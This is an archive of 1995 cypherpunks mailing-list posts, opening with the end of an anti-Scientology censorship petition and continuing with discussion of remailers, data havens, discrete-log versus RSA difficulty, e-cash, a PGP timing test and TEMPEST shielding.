   in the future, to remove any Usenet newsgroup, BBS forum, mailing
   list or other similar forum of public exchange of information over
   any electronic network, or to inhibit in any way the flow of
   information to and from these forums.  This includes, for example,
   ceasing all legal action demanding a) the removal of the Usenet
   newsgroup alt.religion.scientology and b) that anonymous remailers
   add filters as previously described.

3) You will publicly and officially state

   a) That you support the existence of free and open forums on all
      electronic networks to discuss Scientology from all perspectives
      and points of view (which includes yours), and

   b) That you do not support nor condone attempts by any entity to
      electronically censor, remove, obstruct, or tamper with any
      electronic communication except when allowed by a valid court
      order.

If you outright reject or refuse to even discuss these demands in a good
faith manner on Usenet, we have no other option but to consider such
rejection or refusal to even discuss to be an act of hostility by the
Church of Scientology towards the users of all electronic networks and
forums, including the Internet.  We are certain you do not want this,
and we do not want it either, so we offer to work with you any way we
can with regard to any legitimate demands you may have concerning
alleged copyright violation(s) and other illegal activity.

However, any attempts by you of any kind to tamper or in any manner
restrict the free flow of information (other than that *specifically*
restricted by law -- and *only* that) on any electronic network is
totally unacceptable and will not be tolerated for the reasons stated
above.

Signed,




******************* End of Petition Statement ***********************

======================================
Instructions for Signing This Petition
======================================

It must first be noted that this is a petition, not a vote.  By
"signing" it you agree with *all* the demands of the petition
statement.  If you do not agree with all the demands, then your only
recourse is to not sign it.

In addition, all e-mail signatures will be submitted to the Church of
Scientology as well as the newsmedia provided more than 1000 validated
signatures are obtained.  Including your full name is optional, but
very highly encouraged as that would add to the effectiveness of the
petition.  Signing via an anonymous remailer is discouraged, but not
forbidden, as an attempt will be made to separately tally signatures
from anonymous remailers.

Signing this petition is not hard, but to make sure your signature is
not lost or miscounted, please follow these directions exactly:

1) Prepare an e-mail message.  In the main body (NOT the Subject line)
   of your e-mail include the ONE-LINE statement:

SIGNED <Internet e-mail address> <Your full name (optional)>

   You need not include the "<" and ">" characters.  'SIGNED' should
   be capitalized.  As stated above, your full name is optional, but
   highly recommended.  If you do supply your name, please don't use
   a pseudonym or nickname, or your first name -- it's better to just
   leave it blank if it's not your full and real name.

              ***************************************
              Example:  My e-mail signature would be:

              SIGNED noring@netcom.com Jon E. Noring
              ***************************************

2) Please DON'T include a copy of this petition, nor any other text,
   in your e-mail message.  If you have comments to make, send e-mail
   to me personally, and NOT to the special petition e-mail signature
   address.

3) Send your e-mail message containing your signature to the following
   Internet e-mail address and NOT to me:

                     ===========================
                       cos-petition@netcom.com
                     ===========================

4) Within a few days of receipt of your signature, an automated
   acknowledgment will be e-mailed to you for e-mail address
   verification purposes.  You do not need to respond or reply to
   this acknowledgement when you receive it.


Thank you for signing this petition!

Jon Noring

(p.s., send your signature to cos-petition@netcom.com)


- --
OmniMedia           | The Electronic Bookstore.  Come in and browse!  Two
1312 Carlton Place  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
Livermore, CA 94550 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
510-294-8153        | E-book publishing service follows NWU recommendations.


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     A skydiving school is one in which you MUST be a dropout to graduate

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
    All things being equal, a fat person uses more soap than a thin person.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLx3G58lnXxBRSgfNAQFeFAf/TBVzKQAG/y2MAvEvwuMjEXpvtYx6MoDK
v+1WzKBygZcktJTag8QfNEKA1G99cl+VbfK6eoEcC2VMXGrOZHXH8qHQz2uGxLa9
+JA4n4hs19aSw1WJEYxaxrLB+a5cQjjaEybu6u2OP0n2WIdLrMtPPkDDmw0Y/KAs
6uqdbwtxhBQgIFoXSrmv/meuv3cjfsVHMhgPpNGbOBCopgKU3Vq6DzbqcG43kGE5
PD6ThO5G2vYx+wIJc/LFRvnXxXaRbZ9w1uX2OmrDOhRTdGprpKONKYfXc5lhxKf3
UkKruotDVsNY9VGCTW765NfZGz+dvfERIi5KEYwDM4yVNuDE01XRTw==
=B4jE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Wed, 18 Jan 95 20:00:55 PST
To: Craig Hubley <craig@passport.ca>
Subject: Re: FBI and BLACKNET
In-Reply-To: <m0rU8z7-0002GdC@forged.passport.ca>
Message-ID: <Pine.HPP.3.91.950118195153.6655E-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Jan 1995, Craig Hubley wrote:

> Regarding BlackNet, I am not sure that they are not *run* by the FBI,
> or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental 
> entity. 

The more I think about it the more this theory makes sense. I know 
how they _could_ have traced me but this doesn't explain all their other
"leads" they are following up on and he seemed to imply there were many.

>>> Not to mention entrapment is their MO. <<<

What do you say we put the word out?


> Craig Hubley                Business that runs on knowledge
> Craig Hubley & Associates   needs software that runs on the Web
> craig@passport.ca   416-778-6136  416-778-1965 FAX

--Syed





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 20:05:41 PST
To: rishab@dxm.ernet.in
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <gate.i724yc1w165w@dxm.ernet.in>
Message-ID: <199501190404.UAA24779@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
> anon-remailers (which exist today on Sameer's c2.org blind server) and
> data havens. I haven't bothered to hunt for Lance's address, which is not
> given, but really I thought someone as prominent a SysLawyer as him would
> be clued in. Nor have I found the time to send WIRED a letter. 

First, I want to know how Rishab, in India, gets "Wired" so early (or
why I, right next to Silicon Valley, get it so late). He's mentioned
the February issue twice now, and all I have is the January "White
Album."

Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
(?). When I met him a couple of years ago, he'd just gotten out of
jail and was working for the satellite Usenet distribution company
(whose name I don't recall, and who I've heard less of than I might've
expected to, subjunctively speaking).

In any case, there a zillion odd opinions on the Net of a Million
Lies. Most of them will vanish without a trace. That's comforting.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 18 Jan 95 17:22:42 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Good "Economist" article on Cyberspace
In-Reply-To: <199501190038.QAA23631@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950118201336.15785A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Right Tim it was a great article in the Economist Tradition.  I'll post 
it as soon as it makes it into the databases.

Unblievable Barlow Quote:

On-line purists might want nothing to do with government, but government 
was likely to intrude anyway.  So the EFF sought to minimise the 
intrusion; "to keep Pharoh from following us into the Red Sea," as Mr. 
Barlow puts it.


I *want* Pharoh to follow us into the Red Sea, myself.

DCF

--
You don't have to be nice to nation states you meet on the way up if 
you're not coming back down.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 18 Jan 95 20:50:57 PST
To: cypherpunks@toad.com
Subject: Re: Factorisation and Discrete Logs
In-Reply-To: <9501190357.AA12988@toxicwaste.media.mit.edu>
Message-ID: <199501190440.UAA28769@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins <warlord@MIT.EDU> writes:

 > You are right...  Given talks Ive had with Brian LaMacchia,
 > who broke a version of "Secure SunRPC" (a 192-bit prime), he
 > claims that the difficulty is reducing a D-L problem is
 > about the same amount of computation to factorize an RSA
 > modulus of approximately the same size..

Although DH and RSA are believed to be of approximately equal
difficulty given the same number of bits, DH is additionally
vulnerable because system designers usually publish an "official"
modulus and primitive root for everyone to use, whereas in RSA,
everyone has their own key.

To mount an attack on PGP, for instance, you must factor a key
for each person whose privacy you wish to compromise.  Breaking
Sun's published 192 bit DH modulus instantly broke SunRPC on all
machines using the protocol.  The latter was a lot less work than 
the former.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 21:43:25 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <199501190459.UAA26969@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Josh Geller reminded me that it may've been Len Rose I was thinking
of. Len, Lance, I don't know.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Jan 95 21:04:22 PST
To: cypherpunks@toad.com
Subject: Re:  Factorisation and Discrete Logs (was Re: EE Times on PRZ)
Message-ID: <199501190504.VAA03998@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: dwa@mirage.svl.trw.com (Dana Albrecht)
> Choose, at random, "a" such that gcd(a,N) = 1.
> 
> Compute x such that:
> 
>      a^x = 1 (mod N)          [ Discrete log time! ]

DH uses prime moduli, I believe.  Solving the DL problem sufficiently to
break DH may not let you solve it for composite moduli, not without
knowing the factors.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Wed, 18 Jan 95 18:18:30 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SV4.3.91.950118141828.7755B-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950118210105.28469A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Jan 1995, Jonathan Cooper wrote:

> > If the authorities attempt to indict you for possessing illegal
> > information / kiddie porn / whatnot, they have to prove that you
> > interfered with the automatic redistribution process and examined the
> > contents of the submission. If you in fact did not look at the submission,
> > they would have a difficult time doing so. 
> 
>    Unfortunately I've found that the U.S. government especially can make 
> your life a living hell if you don't go along with their desires, even if 
> you're following all the laws.  Trumped-up charges.  Fake charges.  I 
> wouldn't put much past our government.

I think the worst is that the government never seems to be in the mood 
for giving your computer equipment back to you. Hiding your phycal 
location, being out of the question, (old thread), all the government has 
to do is drum up suspision and enough information for a warrant for your 
computer equipment, then your screwed out of a system. If you had a 
system good enough to efectivly handle DH's or even remailers, your out 
of a good sum of money. 

						Groove On Dude
						Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 18 Jan 95 19:13:01 PST
To: cypherpunks@toad.com
Subject: JP vs Homer
Message-ID: <Pine.3.89.9501182150.A23592-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
-----BEGIN PGP SIGNED MESSAGE-----
 
  A side note:  "The ultimate hacks of Wall Street."
    Now THERE is an idea...  You think Donald Trump could see the
    usefulness of e*?  Ivan Boskey?  (sp)
 
 
To the point:
 
     JP's withdrawal, and Homer's thread point to something that I've felt
for a while:  The classification of our tools as munitions has an important
point--they should not be used by children.  A.S.R not withstanding, (such
a person has had their childhood robbed) what we are doing is _very
serious_.  Sometimes we talk about pulling down the entire structure of our
governments and economy as if it we a Sunday afternoon parlor exercise, or
a pipe dream.  It is neither.
 
     We are on the verge of a restructuring of our society.  Cypherpunk
projects are the bleeding edge.  Implementation calls for serious,
considered efforts.  Childish behavior is not only uncalled for, it must be
anticipated and prevented, or as a minimum, found and fought.
 
 
     I have long been concerned that the remailers are far to vulnerable to 
either childish abuse or TLA attacks.  The former is reaching the stage of
threatening to swamp us, either by resource depletion, or by stigmatizing
our efforts.
 
     There is little, if anything, we can do to stop a chained, PGP'ed mail
bomb, "This is mail bomb number XXX.  Boom!"  It is therefore in our best
interest to not encourage children to send such messages in such a way.  I
believe Homer's message was erroneous for this reason.
 
     We do have considerable interest, however, in maintaining a positive
image.  Positive image is a multifaceted jewel.  We must look to preserve
it as much as possible while pursuing our goals.
 
     We are capable of controlling mail bombs, for instance, in the
following way:
 
     Take an incoming message, capture From: line.  Strip header.  MD5 body.
Add to sorted table [From: MD5(message) date].  Check for repetition of
first two fields.  If reps = 1, forward message.  If reps = 2, send message
to From:  "Possible error.  Two copies of message <message> received."  If
reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
spam.  <reps> copies of <message> received from <From:> at your site in the
past week." Clear table of entries more than a week old every midnight.
 
 
     If all remailers did this, then no matter where the net was entered,
the messages would be rejected.  And spammers/bombers would be spamming/
bombing their own postmaster.  Probably a bad idea.  If not all did it,
then add special handling to hit remailer-operator@.  This would encourage
the operator to auto-magically handle the spam-bomb himself.
 
 
     Dealing with huge files and/or TLA's is a topic for another day.
Remember:  spook@cia.gov, snitch@fbi.gov, and cracker@nsa.gov are probably
all listening, maybe even denning@aol.com.  Is it a stretch to consider
that _they_ might spam-bomb us, trying to discourage the best?
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLx3pBHmgMs8UcStNAQGuhAf+KGYJnYRPAODHvjF4CmakZ1oZKDo2BiFQ
5nkphXtoTgADVQM8XlYhqW3MTKhKo30dfZ0/GMLdaZ+4SCM85thqNvLW1klaandk
tuAF4NBTx8f5rb3ufm9iktXv907smf6aUZAwz0T4cl630+/dVPI2Jkit0jid5KmD
TzB/bFr1lM7Vp2ZoR+Y6/geYYNx06OMvLl62hTpGP2KtusFs1erRuYXj8UJkXd77
JNnTLjrPdLhx6iIQ6IxNXAISnmIgXPGFVRto/EEgFa8XWUoOBeuRdBGhT4eoNAjX
45YxdJrmlSPxHZDu8P2rldfays31qPCY7qJtSKBdRzYqqyz8LT+4YQ==
=luXm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:25:16 PST
To: GIETV@ns.rhodes.edu
Subject: Re: Electronic cash illegal?
Message-ID: <9501190223.AA07519@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Within the United States (and most other sovereign states) Hal Finney is
> correct to point out that the power to print currency is reserved to the
> government.  I would think that e-cash is a currency and therefore illegal
> TO ISSUE WITHIN the geographical (legal) domain of the US.  

He didn't say it was illegal to print private banknotes, just taxable.
Anybody can issue paper or metal tokens or whatever - the difference
with goverment-issue currency is that they can pass laws saying you
must accept it as payment for debts, even though your contract
specified repayment in real money instead of private bogons
like green paper IOUs or lightweight impure-metal coins with
politician's pictures on them.

As far as I know, the legal definition of a "dollar" in the US is still a
certain weight of silver, and payment in silver legally satisfies debts;
under current silver prices, that probably costs more than a 
$1 US Federal Reserve Note, so nobody bothers.


		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Jan 95 18:32:30 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110100ab435e5f6310@[129.219.97.131]>
Message-ID: <Pine.SOL.3.90.950118212506.8708C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm not familiar with all aspects of this but one thing argues in favor
of hoping this becomes a test case:  Scientologists are probably more out of 
favor than cypherpunks.  

Brad


On Wed, 18 Jan 1995 Ben.Goren@asu.edu wrote:

> At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote:
> >[. . .] As long as
> >some piece of info is considered to be a thought-crime, everyone who accepts
> >info from a wide range of sources is at risk.
> 
> We might have a test case right now for part of that idea--the
> Scientologists. They're essentially claiming that the various newsgroups
> should be shut down because somebody put thoughtcrime on them. I would
> posit that the operator of any automated data transmission/massaging
> service is not responsible for the data that passes through her equipment.
> Consider, for example, if I used a bang path to route an illicit email note
> through, say, apple.com. Does that make Apple Computer responsible for what
> I send?
> 
> Tying in with some of Eric's comments, this could be viewed as a
> fundamental flaw in the 'net: it's the sender, generally, who initiates and
> controls the connection, not the recipient. We could view this as an
> advantage: how can you blame me for what somebody else does to my computer
> without my knowledge, especially if I have no way to stop it short of
> getting off the 'net completely?
> 
> >> ... The service could even be advertised as a different form of timestamping
> >>(or notarizing). Not only do you get the file back signed, but you get it
> >>back encrypted and signed. ...
> >
> >That would still be a useful service, however, but it does transfer the risk
> >from the DH operator to the encryptor.  Since he isn't leaving evidence on a
> >hard drive, his window of vunerability is somewhat less.
> 
> Less to nonexistent. If no human sees it on the encrypting site, no human
> can be responsible for it. "They" would have to ban the service outright,
> or try to prove that you knew that your site would be used for illicit
> purposes. If putting a warning to not export crypto software on an ftp site
> is sufficient protection--and, judging from the number of sites which do no
> more than that, it is--then a simple statement that the service is not to
> be used for any illegal purpose should do fine here.
> 
> >    --Paul J. Ste. Marie
> >      pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> b&
> 
> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:35:04 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501190233.AA07621@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	I could write a procmail recipe and a script in about an hour to
> automatically secret-share-split and redistribute the incoming submission.
> If the authorities attempt to indict you for possessing illegal
> information / kiddie porn / whatnot, they have to prove that you
> interfered with the automatic redistribution process and examined the
> contents of the submission. If you in fact did not look at the submission,
> they would have a difficult time doing so. 

The problem with a procmail script, unlike the ugly on-the-fly
SMTP-like splitting method I proposed, is that the suspicious message
is in your mail system, intact, and if they nail you before
you can dispose of it, they can prove you had it.
(Even though procmail does stuff quickly, sendmail still
accumulates the material before delivering it, doesn't it?)

They still have to prove that there's something illegal or
forfeiture-supporting about the way you possessed the message,
but by then you're hauled into court and your computer is stolen.
The Feds argued in the Steve Jackson Games fiasco that intercepting
unread mail in mailboxes is different than intercepting it in transit,
and while we can hope that will be overturned, it's better not to
be the guinea pig.

If your machine never has more than a few bits of the message,
they can't catch you in possession of the message - they can only
argue that bits of it flowed through your machine, and that's
much harder to build a case on, and given the abuse the judge
gave the Bad Guys in the SJG case, it's probably easy to prevent
them from keeping your machine as evidence, or at least get it back.

Your paranoia may vary....

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 18 Jan 95 18:56:30 PST
To: jamesd@netcom.com
Subject: Re: Scientologys Attempts
Message-ID: <9501190254.AA07887@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > who has the authority to remove alt. groups?

jamesd writes:
> Anybody has the power.  Nobody has the authority.

More precisely, anybody has the power to send a rmgroup message,
just like anybody has the power to send a cancel message.
Aside from ettiquette and ethics, the question is 
whether most of the news servers out there will respond to them,
which is a local decision.

The last time I ran a news server was in B News days, so your mileage
may vary, but responses to newgroup and rmgroup messages can be
turned on and off.  I used to leave them turned on; not only did
new groups appear on my system without manual intervention,
but the Great Renaming took care of itself automatically on my box.

> [...] This is a classic case of net abuse.
Yep.  rmgroup wars happen occasionally on the net,
usually about alt.joe.newuser.die.die.die and other spam groups
run by (or about) people with more spare time than taste.
The difference here is that it's part of an organized group-sponsored
censorship attempt, rather than an individual squabble,
so it retains some degree of classicity.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 18 Jan 95 20:38:55 PST
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: copyright and data havens
In-Reply-To: <Pine.HPP.3.91.950119000101.4197A-100000@cor.sos.sll.se>
Message-ID: <950118.222008.4k2.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, asgaard@sos.sll.se writes:

>            (by the way, how long might it take to IDEA-encrypt a 2 MB
> .zip file?  I never tried)

Me, neither.  Let's find out....


[1] d:\doom>dir tt.zip

 Volume in drive D is unlabeled      Serial number is 0000:13FD
 Directory of  d:\doom\tt.zip

tt.zip        2292723   1-18-95  22:06
   2,292,723 bytes in 1 file(s)          2,293,760 bytes allocated
   4,853,760 bytes free

[1] d:\doom>timer^pgp +armor=off +compress=off +textmode=off -c tt.zip ^ timer
Timer 1 on: 22:16:16
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1995/01/19 04:16 GMT

You need a pass phrase to encrypt the file.
Enter pass phrase:
Enter same pass phrase again: Just a moment...
Ciphertext file: tt.pgp
Timer 1 off: 22:18:42  Elapsed: 0:02:26.05


'+textmode=off' is probably overkill, since PGP recognizes the non-text
content.  But my config.txt has armor and compress turned on.
Compressing almost doubled the time to encrypt, and armor gave me 39
*.asc files.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLx3pkBvikii9febJAQFfgwP+MkpU2xv9zUPyYIYtzvsTUzSSdjcVi4Dd
8PW8AmVFCu2xHI0Zce8CCh3/i+ZMK15E6xvoFdESwS3mkz9DIBZZ/JfyPu0kQ4Lc
H76HHoBQNyW00K4Alzfa1rkvyiot8j3KjagpOcCazMlCsKfbZ/xa8PSt8ae8H2k5
RpoZ3o8H87k=
=FGL8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 18 Jan 95 19:40:10 PST
To: bill.stewart@pleasantonca.ncr.com    +1-510-484-6204)
Subject: Re: Electronic cash illegal?
In-Reply-To: <9501190223.AA07519@anchor.ho.att.com>
Message-ID: <9501190336.AA12782@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> As far as I know, the legal definition of a "dollar" in the US is still a
> certain weight of silver, and payment in silver legally satisfies debts;
> under current silver prices, that probably costs more than a 
> $1 US Federal Reserve Note, so nobody bothers.

Uhh, no, US currency does not have any backing.  I believe it was
Nixon who stopped it, possibly even earlier than him.  There _used_ to
be Gold- and Silver-backed dollars, but no longer.

The US dollar is backed by trust alone, today.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 18 Jan 95 20:03:06 PST
To: dwa@mirage.svl.trw.com (Dana Albrecht)
Subject: Re: Factorisation and Discrete Logs (was Re: EE Times on PRZ)
In-Reply-To: <9501190339.AA20854@mirage.svl.trw.com>
Message-ID: <9501190357.AA12988@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Comments, anyone?

You are right...  Given talks Ive had with Brian LaMacchia, who broke
a version of "Secure SunRPC" (a 192-bit prime), he claims that the
difficulty is reducing a D-L problem is about the same amount of
computation to factorize an RSA modulus of approximately the same
size..

So, within napkin-computation, you are correct.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 18 Jan 95 23:57:21 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <m0rUn1t-0009tFC@sdwsys>
Message-ID: <199501190756.XAA08643@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen D. Williams wrote:

> Bzzzt....  You're error correction is working overtime...
> 
> That's Len Rose, formerly with Pagesat, currently with barrnet.
> His offense, BTW, was basically giving the source to ATT login.c
> to a college kid...  Documented somewhat poorly in 'The Hacker Crackdown',
> Bruce Sterling.

Enough already! This is the seventh or eighth such correction that's
been sent to me, some of them also sent to the list.

I understand that errors get picked up promptly by all you eagle-eyes,
but enough already.

Thanks,

--Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 21:16:33 PST
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: TEMPEST
Message-ID: <9501190507.AB17284@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 1/18/95, Timothy C. May wrote:
> ... And if nothing is seen with our $10K of equipment, what does this
>prove against an attacker who can easily afford to spend 20 or 30
>times that amount to equip a van?
>
>Cypherpunks have been exploiting technology that is comparatively
>_much cheaper_ and which changes the equation.
>
> ... In general, for reasons many of us have written about here before, and in
>particular, because I think spending $10,000 to prove what we already
>know--that RF emissions can be detected and demodulated--is a poor use
>of money. That $10K would go a long way to getting PGP Phone finished. ...

I'm not sure how encryption chages the equation if that van on the street 
can read the data off your screen and/or printer.  Just as cryptanalysis is 
a necessary component of good cryptography, some sort of VanEck analysis 
would seem to be required in order to evaluate the utility of methods to 
block it.

What exactly would one need to do to block Van Eck monitoring?  I've seen 
computer rooms that were completely lined with copper sheathing.  Is it 
really necessary to go to that extent?  Will aluminum foil and power line 
conditioning handle it?  You can't really tell how effective 
counter-measures are unless you have some way to see what reduction in 
emitted signal they provide.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 18 Jan 95 21:18:16 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <199501190516.AAA09260@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

| rishab@dxm.ernet.in wrote:
| 
| > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
| > anon-remailers (which exist today on Sameer's c2.org blind server) and
| > data havens. I haven't bothered to hunt for Lance's address, which is not
| > given, but really I thought someone as prominent a SysLawyer as him would
| > be clued in. Nor have I found the time to send WIRED a letter. 
| 
| First, I want to know how Rishab, in India, gets "Wired" so early (or
| why I, right next to Silicon Valley, get it so late). He's mentioned
| the February issue twice now, and all I have is the January "White
| Album."

	He doesn't have to contend with the USPS?   (My copy arrived
today, quite beat up, and missing most of its white envelope.  Sigh.)

| Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
| (?). When I met him a couple of years ago, he'd just gotten out of

	You're thinking of Len Rose, not Lance Rose.  (Assuming this
is the L. Rose who features in The Hacker Crackdown.)


	Regarding Rishab's points about the article, I think its a
useful fantasy.  Let Lance think that net.cops will win, until the
reality proves otherwise.  At least he doesn't call for banning
remailers.


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 01:15:06 PST
To: cypherpunks@toad.com
Subject: The Remailer Crisis
